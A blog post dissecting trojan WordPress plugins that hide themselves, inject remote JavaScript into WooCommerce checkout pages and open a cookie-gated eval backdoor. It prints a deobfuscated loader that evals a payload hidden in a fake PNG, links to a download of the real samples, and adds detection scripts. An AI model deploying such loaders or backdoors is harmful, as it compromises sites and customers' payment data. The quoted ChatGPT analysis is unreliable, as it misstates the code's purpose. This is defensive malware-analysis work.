        if ((!defined($okutykh_sirugom->uhibifa_fiweqif())) || (!file_exists($adonexa))) {
            add_action('woocommerce_before_checkout_form', 'echiveq_pysejam');
        }
    }

    if (!defined($okutykh_sirugom->uhibifa_fiweqif())) {
        define($okutykh_sirugom->uhibifa_fiweqif(), 1);
    }
} else {
    if ($okutykh_sirugom->fepanuj_bemucal()) {
        $okutykh_sirugom->alytash_felofuq();
        if ($okutykh_sirugom->ivihity_chazoky) {
            @eval($okutykh_sirugom->ivihity_chazoky);
        } else {
            @eval($okutykh_sirugom->unetoli_izaxoce);
        }
    }
}

A closer read of the decoded class shows what it actually does. thaxica_zuchiti() only checks whether DB_NAME is defined, i.e. whether the file is running inside WordPress, and the code at the bottom branches on that.

Inside WordPress it registers a series of hooks. The pre_current_active_plugins action and the all_plugins filter remove the plugin's own entry (<directory>/<directory>.php, built by xikakhi_ithukeq()) from the list, which is why it never shows up on the plugins page. admin_init runs edewuch_azicich(): for any logged-in editor or administrator it stores an option named wp_<md5 of the visitor's IP> (taken from HTTP_CLIENT_IP or X-Forwarded-For in preference to REMOTE_ADDR) with the current timestamp in wp_options, autoload off, and sets a cookie named pxcelPage_c01002 valid for 604800 * 64 seconds. That cookie is an exclusion flag: qyborih_qonugyh() does nothing when it is present, so the people most likely to notice the injection, the site's own admins and editors, never see it. Unless YII_WWW_PATH is already defined, it hooks woocommerce_before_checkout_form with echiveq_pysejam(), which calls qyborih_qonugyh(). On a GET request from a visitor without that cookie it fetches https://stegozaurus.cc/wp/widget.txt with custom request headers (discount:, order:, price:, merchant:, address:) carrying two checksums of the host name, the client IP, the host name and the server IP; a response matching ^[A-Za-z0-9+/=]+$ is cached in the plugin's README.txt for 604800 / 7 seconds (one day) and echoed into the page as base64_decode(strrev(response)). If nothing comes back it prints assets/js/ezhacap.js, or the decoded assets/images/ewegukh.png, inside <script> tags. In short, attacker-controlled JavaScript is injected into the WooCommerce checkout form, the page where customers enter payment details, and hidden from the site's staff. The esutozh.gif stage, eval'd when YII_WWW_DIR is not defined, is a further encoded payload that is not decoded in this post.

The second half is a remote code execution backdoor, reachable both through the init hook inside WordPress (gifocux_lekhodi()) and by requesting lupuqop.php directly. soshigy_yroxykh() decodes zhelidi.gif, treats it as a list of 32-byte tokens and picks one by crc32 of the Host header. pesivoj_yshusig() derives two cookie names from the upper-cased Host header, a 5- or 6-character one and a 4- to 7-character one, each a string of alternating vowels and consonants, so the names differ for every site. elikhov_ebaniny() then checks that the md5 of the first cookie's value equals the token. If it does and the second cookie or POST field is absent, it prints assets/images/dulishy.png after running it through upeketh_cujowel() and deletes the file, a one-shot drop. If the second cookie is present, its value is base64-decoded, treated as a URL and fetched with curl (Firefox user agent, redirects followed, certificate checks disabled); if the POST field is present, its value is simply base64-decoded. Either way the result is handed to eval, so whoever holds the right cookie runs arbitrary PHP on the server. Nothing in the code shown reads the real WordPress login cookies, but what the eval'd stages (usepir.gif, esutozh.gif, whatever the remote server returns) do is unknown, so everything the site can reach, the database credentials in wp-config.php included, should be treated as exposed. One handy fingerprint: when lupuqop.php is requested directly, outside WordPress, and zhelidi.gif is present, the class adds a response header named gegel3 carrying the token index, so fetching the file directly and inspecting the response headers confirms an infected copy. Bear in mind that such a request also runs the usepir.gif stage on the server.

For cleanup this means more than deleting the directories: the wp_<32 hex characters> rows in wp_options and the cached README.txt are worth removing, anything else the backdoor may have written into the web root is suspect, and rotating the salts in wp-config.php invalidates every existing login cookie.

The plugin does not appear on the plugin list page, but after deleting the files and returning to the dashboard, several plugins show as disabled because their files no longer exist.
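An added example, not code from the post or from the malware: a Python port of the two derivation routines described above, so the backdoor's trigger can be recognised without running the PHP. cookie_names() reproduces pesivoj_yshusig() for a given Host header, and host_token() reproduces the 32-byte token selection of soshigy_yroxykh() (including the signed-crc32 fold of awushif_nisubog()) from the decoded zhelidi.gif. The host name and the four fake tokens used in the demo are constructed; with the real decoded zhelidi.gif this gives the md5 digest the attacker's first cookie has to hash to, and the cookie names to search for in any full-request logs (WAF, reverse proxy) you keep, since ordinary access logs do not record cookies.

```python
import hashlib
import zlib

CONSONANTS = "qwrtpsdghjklzxcvbnm"
VOWELS = "eyuoa"


def derive_name(seed: str, lo: int, hi: int) -> str:
    """Port of pesivoj_yshusig(): a deterministic string of alternating
    vowels and consonants, lo to hi-1 characters long, keyed to the seed."""
    total = 0
    for i, ch in enumerate(seed):
        c = ord(ch)
        total += c + c * (c + i)
    extra = total % (hi - lo)
    parity = total % 2
    out = []
    for i in range(lo + extra):
        c = ord(seed[i % len(seed)])
        v = total + c + i + (c + i) * (c + i)
        if (i + parity) % 2:
            out.append(CONSONANTS[v % len(CONSONANTS)])
        else:
            out.append(VOWELS[v % len(VOWELS)])
    return "".join(out)


def cookie_names(host: str) -> tuple:
    """elikhov_ebaniny() upper-cases the Host header; the trigger cookie name
    comes from that, the payload cookie/POST field name from it doubled."""
    h = host.upper()
    return derive_name(h, 5, 7), derive_name(h + h, 4, 8)


def php_crc32_abs(s: str) -> int:
    """awushif_nisubog(): PHP crc32() folded to a signed 32-bit value, then abs()."""
    c = zlib.crc32(s.encode("latin-1"))
    if c & 0x80000000:
        c -= 0x100000000
    return abs(c)


def host_token(zhelidi_plain: bytes, host: str) -> bytes:
    """soshigy_yroxykh(): the decoded zhelidi.gif is a run of 32-byte tokens
    and the crc32 of the raw Host header picks one. The backdoor accepts the
    trigger cookie when md5(cookie value) equals this token."""
    slots = len(zhelidi_plain) // 32
    idx = php_crc32_abs(host) % slots
    return zhelidi_plain[idx * 32 : idx * 32 + 32]


def cookie_matches(cookie_value: str, zhelidi_plain: bytes, host: str) -> bool:
    """The comparison elikhov_ebaniny() makes before it will eval anything."""
    return hashlib.md5(cookie_value.encode()).hexdigest().encode() == host_token(zhelidi_plain, host)


if __name__ == "__main__":
    # Constructed inputs: a made-up host and four fake 32-byte tokens.
    host = "shop.example.com"
    fake_tokens = b"".join(("%032x" % n).encode() for n in range(4))
    trigger, payload = cookie_names(host)
    print("trigger cookie:", trigger)
    print("payload cookie/POST field:", payload)
    print("expected md5 of trigger cookie:", host_token(fake_tokens, host).decode())
```

Because the names are pure functions of the Host header, the same infection on two sites answers to two different cookie names, which is why a generic signature for the trigger is not possible and the derivation has to be run per site.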

Browsing the backup files shows that all of these files were created after September.

My guess is that these plugins were planted when plugins were updated or replaced during that period, or that an old plugin had a vulnerability that was exploited. Since another WordPress install on the same server did not get any of these trojan files, it probably was not the server itself that was compromised. The several plugins share essentially the same structure and a similar directory layout.

dyfruit

<?php

function etypody_kichijo($thamyje_axakopy) {
    if (!file_exists($thamyje_axakopy))
        return false;
    $bemukej = @file_get_contents($thamyje_axakopy);
    if (!$bemukej)
        return false;
    $bemukej = substr($bemukej, 3);
    $iheleku = zhutymo_anadash($bemukej);
    return $iheleku;
}

function zhutymo_anadash($thamyje_axakopy) {
    $azesuku = vufusit_ekhijoj;
    $cufiku = array();
    for ($ogucam = 0; $ogucam < strlen($azesuku); $ogucam += 2) {
        $fyjyzha = substr($azesuku, $ogucam, 1);
        $hususo = substr($azesuku, $ogucam + 1, 1);
        $cufiku[$fyjyzha] = $hususo;
    }
    $khunugo = strtr($thamyje_axakopy, $cufiku);
    $khunugo = base64_decode($khunugo);

    return $khunugo;
}

define("vufusit_ekhijoj", "i+eRPQACEoCS7u00XeIIOU1j=bSVfk+83hYYQNoTGnacNGjssablxqrrydhKHH8=54F9JFRDk/LO91Ki2fu742lwz6WAqWnxwBTMmgBpg3/zDPdE6mZJpZvvVytXU5cLMt");

$adafoja = etypody_kichijo(__DIR__ . "/ass" . "ets/i" . "mage" . "s/oth" . "ejuq." . "png");
if ($adafoja) {
    @eval($adafoja);
}

Deleted the files, changed the password, and that is it for now. It is hard to trace how these files were planted in the first place. I have zipped up the trojan files; anyone interested can download them from the link below, but whatever you do, do not install them on your own WordPress site.

Download: https://www.123pan.com/s/ucY7Vv-v8VHA.html (extraction code: 8shq)
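An added example, not from the post: finding these plugins relied on spotting unfamiliar directory names, which does not scale across a server with several sites. The triage script below walks a wp-content/plugins directory and flags the traits visible in the decoded code: image files whose bytes are not an image, PHP that feeds eval() from a file read, string literals chopped into short concatenated pieces, and code that edits the plugin list. The heuristics and thresholds are my own, and the sample tree it writes for its self-test is constructed (one clean plugin and one that imitates the eqytutacih layout); it is not real malware.

```python
import os
import re
import sys
import tempfile

# A real image starts with a full signature; the loaders above only strip
# three bytes, so whatever those bytes are, a base64 body cannot follow a
# real GIF89a or PNG header.
IMAGE_MAGIC = {
    ".gif": (b"GIF87a", b"GIF89a"),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
}

# Traits taken from the decoded code in the post: eval() fed by a file read,
# string literals chopped into short concatenated pieces, and hooks that
# edit the plugin list. Thresholds are this script's own choice.
RE_EVAL = re.compile(r"@?eval\s*\(")
RE_FILE_READ = re.compile(r"file_get_contents|\binclude\b|\brequire\b")
RE_SPLIT_LITERAL = re.compile(r'"[^"\n]{1,8}"\s*\.\s*"[^"\n]{1,8}"')
RE_LIST_TAMPER = re.compile(r"all_plugins|pre_current_active_plugins")


def classify_file(relpath: str, data: bytes) -> list:
    """Return the list of heuristics a single file trips (empty if none)."""
    ext = os.path.splitext(relpath)[1].lower()
    tags = []
    if ext in IMAGE_MAGIC:
        if not data.startswith(IMAGE_MAGIC[ext]):
            tags.append("fake-image")
    elif ext == ".php":
        text = data.decode("latin-1")
        if RE_EVAL.search(text) and RE_FILE_READ.search(text):
            tags.append("eval-from-file")
        if len(RE_SPLIT_LITERAL.findall(text)) >= 3:
            tags.append("split-literals")
        if RE_LIST_TAMPER.search(text) and "unset(" in text:
            tags.append("plugin-list-tamper")
    return tags


def scan_tree(root: str) -> dict:
    """Walk a plugins directory; return {relative path: tags} for hits."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            with open(full, "rb") as fh:
                tags = classify_file(rel, fh.read())
            if tags:
                findings[rel] = tags
    return findings


# Constructed sample tree for the self-test (not real malware): one clean
# plugin and one that imitates the eqytutacih layout from the post.
SAMPLE_TREE = {
    "hello-dolly/hello.php": b"<?php\nfunction hello_dolly() { echo 'Hello'; }\n"
                             b"add_action('admin_notices', 'hello_dolly');\n",
    "hello-dolly/assets/logo.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 16,
    "eqytutacih/lupuqop.php": b'<?php\n$p = __DIR__ . "/asse" . "ts/i" . "mage" . "s/ohal" . "oth." . "gif";\n'
                              b"$c = @file_get_contents($p);\n@eval(substr($c, 3));\n",
    "eqytutacih/assets/images/ohaloth.gif": b"GIFaGVsbG8gd29ybGQ=",
}


def demo_findings() -> dict:
    """Write SAMPLE_TREE to a temporary directory, scan it, clean up."""
    with tempfile.TemporaryDirectory() as root:
        for rel, data in SAMPLE_TREE.items():
            path = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as fh:
                fh.write(data)
        return scan_tree(root)


if __name__ == "__main__":
    # python triage_plugins.py /var/www/html/wp-content/plugins
    # (with no argument it scans the constructed sample tree instead)
    results = scan_tree(sys.argv[1]) if len(sys.argv) > 1 else demo_findings()
    for rel, tags in sorted(results.items()):
        print(f"{rel}: {', '.join(tags)}")
```

Run it against every site on the server, not only the one that showed symptoms; a hit on fake-image together with eval-from-file in the same plugin directory is the pattern of this family, while split-literals alone is a weaker signal that deserves a manual look.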

Appendix: ChatGPT's analysis of the code, reproduced as returned. Read it with care: its first point has the purpose backwards (the host and cookie checks gate the backdoor for the attacker, they do not keep attackers out), the "page filtering" is really the plugin-list hiding, and the "custom Base64" functions are the substitution table.

This code is a WordPress plugin whose main functions include:

Preventing malicious access: By checking certain parameters of the HTTP request, such as the requested host and the request method, together with some custom algorithms, it determines whether an access is malicious. If malicious access is detected, it returns an image or performs other actions to prevent further attacks.

Dynamically generating JavaScript code: By reading a file named ezhacap.js, it outputs its contents as JavaScript code. This JavaScript is embedded into the WordPress page.

Handling requests: By processing the parameters of the HTTP request, particularly cookies and POST requests, it executes certain logic. Depending on specific conditions it may return a specific image, execute some JavaScript code, or perform other actions.

Deleting a specified file: Under certain conditions it attempts to delete a file named dulishy.png. This may be to clean up temporary files or traces.

WordPress page filtering: In the WordPress admin pages it modifies the page list, dynamically removing certain pages.

Generating specific paths: It provides a number of functions, such as xikakhi_ithukeq(), zofeber_uvyreha(), fesikhe_suzhage(), izhigyc_omizikh(), uhibifa_fiweqif() and xigohaf_ycavylu(), for generating specific path strings.

Base64 encoding and decoding: It provides the functions yzhalaw_oxahuru() and upeketh_cujowel() for custom Base64 encoding and decoding of strings.

Executing remote requests: Using cURL or PHP's stream_context_create and file_get_contents functions, it executes remote HTTP requests, obtains the remote server's response, and executes some logic based on that response.

Dynamic JavaScript loading: By outputting a piece of JavaScript code, it dynamically loads other JavaScript files.

Other: It also includes other functions and operations, such as alytash_felofuq(), fepanuj_bemucal(), elikhov_ebaniny(), opopoth_lacalur(), mechovy_iqichus(), qyborih_qonugyh(), soshigy_yroxykh(), gifocux_lekhodi(), ociluch_eshynen(), echiveq_pysejam() and so on, which implement the plugin's specific functional logic.

Please note that this code carries security risks, because it includes the ability to execute remote requests and to execute code dynamically, which may lead to potential security problems. Be very careful when using or analyzing this code.

☆ Copyright ☆

* Site: obaby@mars
* URL: https://obaby.org.cn/
* Personal: https://oba.by/
* Title: 抓马记 (Catching a Trojan)
* Link: https://obaby.org.cn/2023/12/14787
* Short link: https://oba.by/?p=14787
* Please credit the source, the original title and the original link when reposting. This work is licensed under the Creative Commons Attribution-NonCommercial-ShareAlike 2.5 China Mainland (CC BY-NC-SA 2.5 CN) license.


21 comments

  1. Level 4 (Microsoft Edge 120, Windows 10; Suqian, Jiangsu, China; China Mobile)

    The site files from before I migrated also turned up a trojan. I did not analyze it; I just did a complete transplant.

    1. 公主 Queen (Google Chrome 118, Mac OS X 10.15; Qingdao, Shandong, China; China Unicom)

      A complete transplant is one option. It depends on the situation; if nothing else works, just do a clean overwrite install.

  2. Level 6 (Google Chrome 120, Windows 10; Beijing, China; China Telecom)

    In the days after you reported it, a thorough check found nothing at all. Also did a complete transplant; MySQL went through a complete transplant too.

    1. 公主 Queen (Google Chrome 118, Mac OS X 10.15; Qingdao, Shandong, China; China Unicom)

      But the computer at home still flags it as a virus; all I could do was add you to the whitelist ~~ :angel:

  3. Level 5 (Firefox 120, Windows 10; Kunming, Yunnan, China; China Telecom)

    The most annoying thing about WP is exactly this: the files keep piling up, and at a frightening rate, and without some technical skill you cannot tell what they are. I recently started a new WP site and ran into a similar problem.

    1. 公主 Queen (Google Chrome 118, Android 10; Qingdao, Shandong, China; China Unicom)

      The main thing is that I have no idea where these trojan plugins came from :no:

    1. 公主 Queen (Google Chrome 118, Mac OS X 10.15; Qingdao, Shandong, China; China Unicom)

      Yes, most likely a plugin I uploaded at some point was bad, or a plugin vulnerability was exploited. Looks like I will need to keep a regular eye on it.

  4. Level 3 (Google Chrome 86, Windows 10; Chengdu, Sichuan, China; China Telecom)

    I no longer like installing plugins; I delete every unused plugin and theme, since that is where the junk hides.
    Looks like images need watching too; who knew they would be used to hide encrypted code.
    The trojan intercepts cookies; I wonder whether changing the admin password is enough to stop it?

    1. 公主 Queen (Google Chrome 118, Mac OS X 10.15; Qingdao, Shandong, China; China Unicom)

      WP can log out all logged-in sessions; after changing the password, just log out all sessions.

    1. 公主 Queen (Google Chrome 118, Mac OS X 10.15; Qingdao, Shandong, China; China Unicom)

      There are plenty of mature code-obfuscation schemes, but deobfuscation is a pain.
      The whole point of obfuscating is to make sure you cannot read it or tell what it is for.

  5. Level 5 (Firefox 120, GNU/Linux; Zhuhai, Guangdong, China; China Telecom)

    Impressive, you can even crack the obfuscation. That is PHP for you: upload a single .php file and you can change and execute the program. Then there is the high-risk function eval. Java does not have this problem; Python probably does too; any scripting language will.

  6. Level 4 (Google Chrome 120, Mac OS X 10.15; Qingyuan, Guangdong, China; China Telecom)

    Advanced stuff; I am completely lost. I only understood the first picture. Mm, nice.

    1. 公主 Queen (Google Chrome 118, Mac OS X 10.15; Jinan, Shandong, China; China Unicom)

      Not too bad; there were forty-odd in total, and I have now deleted all the disabled ones.
